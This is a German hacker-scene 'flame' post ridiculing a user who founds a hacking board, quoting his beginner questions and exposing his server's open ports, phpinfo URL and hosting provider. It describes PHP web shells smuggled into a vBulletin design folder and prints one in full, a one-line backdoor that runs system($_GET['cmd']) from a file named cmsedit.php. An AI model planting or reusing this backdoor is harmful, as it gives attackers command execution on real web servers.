secret-level.org

DrSheld0n (secret-level.org)

Am 30.10.2011 registrierte sich der User DrSheld0n aka. Daddy, der zuvor nur auf Foren registriert war, die sich mit dem Ausnehmen von Menschen beschäftigen, auf Free-Hack. Offensichtlich hatte er so viel Freizeit in die Betrugsforen gesteckt, dass er ohne sie oder zumindest ohne Boards, die er damit verknüpft, nicht mehr kann. Als Ausgleich für die Betrugboards, die so ziemlich restlos und höchstwahrscheinlich nur temporär durch den Angriff der Happy Ninjas verschwanden, fand er Free-Hack, das leider mittlerweile zusammen mit den Fraud-Foren unter dem Begriff "Scene" verpackt wird. Um nun in der harten, harten Welt der echten Hacking-Scene mit einem nicht all zu schlechten Ruf überleben zu können, kündigte er genau 80 Minuten nach dem Erstellen seines Vorstellungsthreads an, ein Board zu gründen zu wollen. Jetzt stellt sich natürlich die Frage, wieso möchte ein Betrüger, der zwangsweise eine Alternative für all die Fraud-Boards finden musste und auf einem Hacking-Board landete, ein weiteres Hacking-Board gründen. Logische Überlegungen meinerseits waren: Vielleicht ist er mit dem Konzept Free-Hacks nicht einverstanden, vielleicht fand er Dinge, die dringend verbessert werden müssen und er hat die Sektion "Lob, Kritik & Verbesserungsvorschläge" nicht gefunden. Nach einigem Grübeln fand ich jedoch heraus, dass all meine Vermutungen Schwachsinn waren und der wahre Grund kam mir zum Vorschein. DrSheld0n möchte einen großen E-Penis, ein eigenes Security-Board leiten und somit einen zumindest gleichhohen oder gar höheren Community-Rang erreichen, wie er ihn auf den Fraud-Boards hatte. Das Gute dabei, wenn die Betrugsforen sich demnächst wieder erholt haben und der Schmutz dort wieder Fuß fasst, kann er stolz von seiner Angesehenheit auf Free-Hack und seinem eigenen Security-Board berichten und wird möglicherweise noch in eine Very-Important-People-Benutzergruppe gesteckt.

In seinem Vorstellungsthread auf Free-Hack steht, er sei 19 Jahre alt und studiere Informatik. Seine Skills seien das Betreiben von Botnetzen, Phishing, sowie das Programmieren in den Sprachen VB6, VB.NET, Java, C++, PHP, HTML und ASP. Das Komische ist, dass er in dem Thread, in dem er Teamler für sein künftiges Projekt sucht, der sechs Tage danach erstellt wurde, angibt C++ doch nicht zu beherrschen, sondern die Sprache derzeit zu lernen und ASP hat er offensichtlich komplett verlernt (wird nicht mehr genannt).

Also ich wäre bereit für den Anfang umerstmal zu schauen wie das Projekt läuft so um die 40? auszugeben.


Ich will hier nicht sein bescheidenes Budget kritisieren, sondern ihm nur helfen und ihn darauf hinweisen, dass er sein hart Erspartes andersweitig investieren sollte, da es andernfalls flöten geht.

ich spielte seit einige Zeit bereits mit dem Gedanken ein reines Hacking-Board zu eröffnen. Das Grundgerüst seht. Es fehlt nur noch ein Team.
Derzeit sind wird 2 Admins, die es leiten.


Das ist leider falsch. Du suchst nicht nur ein Team, sondern auch einen fähigen Techmin und jemanden, der dich ersetzt, da du offensichtlich keine Ahnung von der Materie hast. Im Allgemeinen ist es üblich, bei dem Spielen des Gedankens ein Forum zu eröffnen, mögliche Teamler aus dem Kreis der engeren Bekanntschaft bereits vorher mit einzukallkulieren, anstatt im Internet nach Unbekannten zu suchen, deren äußerer Anschein dich, der zumindest in dem Bereich unwissend ist, davon zu überzeugen, der Richtige zu sein.

Weitere Informationen:
www.Secret-Level.org


Ich frage mich, wie er auf diesen Namen kam. Ein Public Board, dessen Namen "Secret" beinhaltet ist ja schon einmal fragwürdig.
Doch nicht nur die Domain hat mich verwirrt, sondern auch der Inhalt der Seite auf die man gelangt.

Es mengten sich viele Rechtschreibfehler an, auf die bereits der User "Death~" von Free-Hack aufmerksam machte.

ich wollte von euch wissen, welche Forensoftware ihr bevorzugt und welche Version.
Ich persönlich bevorzuge vBulletin. gibt viele PlugIns und Templates.


Hier informiert sich DrSheld0n über eine geeignete Boardsoftware und sucht für seine Idee, vBulletin zu verwenden, Bestätigung.

In einem weiteren Thread auf Free-Hack, informiert er sich über bekannte Lücken in der 3.8.7er Version von vBulletin, anstatt direkt eine gepatchte Version einzuspielen. Wieso das? Nahm er etwa eine nulled vBulletin Version und hat sich doch nicht wie angegeben von Fraud distanziert? Seht selbst:

wollte von euch wissen, welche Lücken euch in der Version bekannt sind?
Eventuell mit Fixx. Habe nun einige gefixxed. Eventuell gibt es noch mehr.


Und es geht weiter... Eine weitere Anfängerfrage, die von jemandem kommt, der mittlerweile ein Board leitet und die Verantwortung für die Sicherheit der User übernimmt.

ich möchte mich darüber informieren, was man gegen DDoS auf einem Linux VPS machen kann und bis wie viel PPS man einen absichern kann.


Weiter gehts:

Gibt es irgendwo eine Anleitung/Scripts für IPTables?
Gibt es noch möglichkeiten gegen SYN-DDoS zu sichern? Meine mal irgendwo was über SYN-Cookies gelesen zu haben


Die Antworten der User interessieren DrSheld0n nicht oder er versteht sie einfach nicht, er benötigt daher eine idiotensichere Anleitung.

Bin leider noch nicht auf B2H freigeschlatet.


Sollte das wirklich passieren?

habe mir eben einen TestVPS besorgt und wollte nginx installieren. Leider habe ich von Linux noch nicht viel Ahnung. Eventuell kann mir jemand helfen.


Man sieht es:
http://www.secret-level.org:8088/
http://www.secret-level.org:8088/phpinfo.php

Auch die Protection war für den Ar***, dank den offenen Ports weiß jeder, dass er bei Epiohost hostet:



Doch das war noch lange nicht alles. Nicht nur zahlreiche offene Ports (z.B. der Port 7778, auf dem Kloxo läuft), sondern auch der Umgang mit php-Shells fällt auf.

Der Noob hat mir versucht eine php_shell unterzujubel in einem vB Design


Das Zitat bezieht sich auf Some0ne, der übrigens auch einer der größten Vollpfosten ist, von dem ich je gehört habe (vielleicht bekommt er bei Gelegenheit einen eigenen Flame). Dieser hatte versucht eine php-Shell einzuschmuggeln, indem er DrSheld0n ein vbDesign Ordner gab. Im Ordner "smilies" lag auffällig neben den gif-Smilies eine php-Datei (smilies.php). Bereits in der zweite Zeile des Scripts steht deutlich in 1337H4xX0r!1elf!!-Schrift "SyRiAn Sh3ll V7" und anschließend ein Haufen auffälliger Kinder-Ascii-Art. Die Shell ist übrigens höchstwahrscheinlich backdoored gewesen (ein weiterer Fail Some0nes).
Hier übrigens das VirusTotal-Ergebnis der Shell: *Click*
(erbärmlich, wenn man eine php-Shell nicht fud bekommt... -> Fail Some0ne)

Nachdem DrSheld0n jedoch irgendwann den Hinweis bekam, dass eine Shell im Ordner liegt, hat er reagiert, die Shell entfernt und diesen Erfolg stolz auf Free-Hack präsentiert. Doch dann kam ein weitere Fail zum Vorschein. Er übersah auch die Shell im Editor-Ordner (cmsedit.php), mit offensichtlichem Inhalt:

<?php
if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}
?>

"Oh nein", dachte sich DrSheld0n, jetzt merken alle, dass ich keinen Plan von allem habe. Doch dann kam er mit folgendem Satz, der natürlich klarstellt, dass er von Anfang an beide Shells entdeckte:

Shell wurden alle gefunden. Es reicht ja eine zu nennen.


Es geht noch dreister. Die Free-Hack Regeln wurden eins zu eins übernommen.
http://www.secret-level.org/showthread.php?t=30 und
http://free-hack.com/misc.php?do=cfrules